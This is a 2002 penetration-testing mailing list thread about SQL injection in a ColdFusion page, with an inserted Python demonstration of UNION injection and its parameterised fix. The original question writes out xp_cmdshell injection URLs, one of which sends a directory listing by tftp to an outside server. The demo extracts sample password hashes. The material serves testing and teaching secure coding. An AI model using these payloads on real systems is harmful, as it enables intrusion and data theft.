Penetration Testing mailing list archives

RE: CFM SQL injection


From: "Wertheimer, Ishai" <iwertheimer () kpmg com>
Date: Tue, 1 Jan 2002 01:57:06 -0500

Note that the response you got was from an Oracle SQL server, and
xp_cmdshell is for MS SQL Server ...

You would do better to use UNION or the like to get unauthorized data from the
database.

Ishai Wertheimer


-----Original Message-----
From: Charlie Liserne [mailto:Chili () SexMagnet com]
Sent: Monday, December 24, 2001 9:14 PM
To: pen-test () security-focus com
Subject: Re: CFM SQL injection


Hi,

I'm trying to get the C:/ directory, but I'm not able to do that. This is a
non-intrusive pen-test, so I wouldn't like to have to exec something like:

http://www.server.com/page.cfm?page_id=9999; EXEC master..xp_cmdshell 'dir *.* > c:\listing.txt' --'
http://www.server.com/page.cfm?page_id=9999; EXEC master..xp_cmdshell 'tftp listing.txt my.server' --'

I would like to get a listing of the c: directory in a clean way, without
writing to disk, and get the results appearing in my web browser.

I know some column names, but I can't figure out how it could be possible to read
or modify them. Also, I'm not able to get a listing of the directory; the ' escape
character isn't necessary, but when I do:

http://www.server.es/page.cfm?page_id=12; EXEC master..xp_cmdshell 'dir';

The response is:
ODBC Error Code = S1000 (General error)
[Oracle][ODBC][Ora]ORA-00911: invalid character

Where is the invalid character?? How could it be possible to take advantage
of a ColdFusion programming error? Some time ago, a message from Rick Redman
(Minga) appeared on this mailing list, speaking about how easy it is to
break into a ColdFusion app if the programmers aren't 100% trained in secure
coding practices. I was searching the Internet about this, and about how to
take advantage of the programming errors, but I can't figure out how to
subvert a cfm application. Do you know if there is any document about
this?

Best Regards,
Charlie.


*********** REPLY SEPARATOR  ***********


It looks like the query that you're attacking isn't prepending and
appending quotes to your input.  The string build probably looks a lil'
sumthin' like this:

Query = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID = " & strPageID

   This means that there is no need to use quotes in order to perform a
successful injection.  So, try something like this:

http://www.server.com/page.cfm?page_id=9999 UNION SELECT OtherField FROM
OtherTable WHERE 1=1

   Hopefully this will return an error complaining about an invalid table
name, or at least another error that may give you a better idea of what the
web application is doing with your argument.
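The string build the last reply guesses at (an unquoted numeric page_id concatenated straight into the query) is the classic shape for this injection, and the same reply's suggestion of deliberately provoking an error is a reliable way to learn the column count before a UNION will succeed. The following is an added example, not code from the thread: it models the vulnerable build against an in-memory SQLite database with constructed sample tables (`pages`, `users`, the `admin` row and its hash are all made up), shows the column-count error, a UNION that actually pulls rows from another table, and the parameterised version of the same lookup. The thread's real target was Oracle behind ColdFusion/ODBC, so the error text differs there; in particular, a stray `;` inside the statement text is a common cause of the ORA-00911 "invalid character" Charlie quotes, and Oracle also requires a `FROM` clause (typically `FROM DUAL`) on every SELECT, both of which this SQLite model cannot reproduce.

```python
"""
Added example (not from the mailing-list thread): UNION injection into an
unquoted numeric parameter, and the parameterised fix.  All table names,
rows and the password hash below are constructed sample data.
"""
import sqlite3


def setup_db():
    """Build a throwaway database with a page table and a second table the
    injection will read from.  Constructed data, not from any real system."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages(page_id INTEGER, title TEXT, body TEXT);
        INSERT INTO pages VALUES (12, 'Home',  'Welcome');
        INSERT INTO pages VALUES (13, 'About', 'About us');
        CREATE TABLE users(id INTEGER, username TEXT, pwhash TEXT);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def vulnerable_lookup(conn, page_id):
    """Mirrors the string build guessed in the reply:
        Query = "SELECT ... WHERE PageID = " & strPageID
    No quotes around the value, so no quote is needed to break out of it."""
    query = "SELECT title, body FROM pages WHERE page_id = " + page_id
    return conn.execute(query).fetchall()


def safe_lookup(conn, page_id):
    """Same query with a bound parameter (cfqueryparam in ColdFusion terms).
    The driver sends the value separately, so it can never become SQL syntax."""
    query = "SELECT title, body FROM pages WHERE page_id = ?"
    return conn.execute(query, (page_id,)).fetchall()


def demo():
    """Run the three cases and return the results for inspection."""
    conn = setup_db()
    results = {}

    # Ordinary request.
    results["normal"] = vulnerable_lookup(conn, "12")

    # Column-count mismatch: the reply's one-column UNION against a two-column
    # query.  The database refuses, and the error text tells the attacker
    # something about the query shape (which is why the reply suggests it).
    try:
        vulnerable_lookup(conn, "9999 UNION SELECT username FROM users WHERE 1=1")
        results["mismatch_error"] = None
    except sqlite3.OperationalError as exc:
        results["mismatch_error"] = str(exc)

    # Matched column count: page_id 9999 does not exist, so the only rows
    # returned are the UNIONed ones, which the page renders as if they were
    # page content.  No file written, nothing executed on the host.
    payload = "9999 UNION SELECT username, pwhash FROM users WHERE 1=1"
    results["union"] = vulnerable_lookup(conn, payload)

    # Same payload through the parameterised query: it is compared as a
    # value against the integer column and matches nothing.
    results["safe"] = safe_lookup(conn, payload)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The `union` case is the "clean" read Charlie was after: data from another table lands in the HTTP response without touching the filesystem or xp_cmdshell, and the `safe` case shows that the fix is to stop building the statement from the raw parameter rather than to filter characters.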





----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
*****************************************************************************
The information in this email is confidential and may be legally privileged.
It is intended solely for the addressee. Access to this email by anyone else
is unauthorized. 

If you are not the intended recipient, any disclosure, copying, distribution
or any action taken or omitted to be taken in reliance on it, is prohibited
and may be unlawful. When addressed to our clients any opinions or advice
contained in this email are subject to the terms and conditions expressed in
the governing KPMG client engagement letter.         
*****************************************************************************
